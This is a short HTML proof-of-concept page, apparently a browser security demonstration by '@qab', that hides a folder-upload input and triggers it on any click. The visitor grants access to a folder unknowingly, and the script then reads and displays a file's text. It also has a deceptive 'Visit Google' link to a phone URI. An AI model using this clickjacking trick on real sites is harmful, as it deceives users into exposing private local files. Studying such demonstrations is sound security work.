<html>
<head>
    <title>
		Read all files on PC - PoC - By @qab
    </title>
    <style>
        #thing {
            opacity: 0.0;
        }
    </style>
</head>

<body>
	<center>
    <h1 id="qmsg"> Click Anywhere on page And Select any Folder </h1>
    <input id="thing" type="file" webkitdirectory mozdirectory accept="text/*" />
<a id="yourLinkID" onclick="myFunction();" href="tel:688" target="_blank" rel="noopener noreferrer">Visit Google</a>
</center>
    <script>
	
		  var r = new FileReader();
        thing.onchange = function() {
            alert('I can read ' + this.files.length + ' files from anywhere on your pc!');//This is for PoC only. We can access all data using this.files as seen next.
			r.onload=function(){
				alert(r.result);
			};
			
			r.readAsText(thing.files[0]);
        };
		
		window.onblur=function incognito() {

		}
		
function myFunction() {




}
		
document.onclick = function(){


		 thing.click();




}

		
		
        var i = 0;
  
    </script>
</body>

</html>
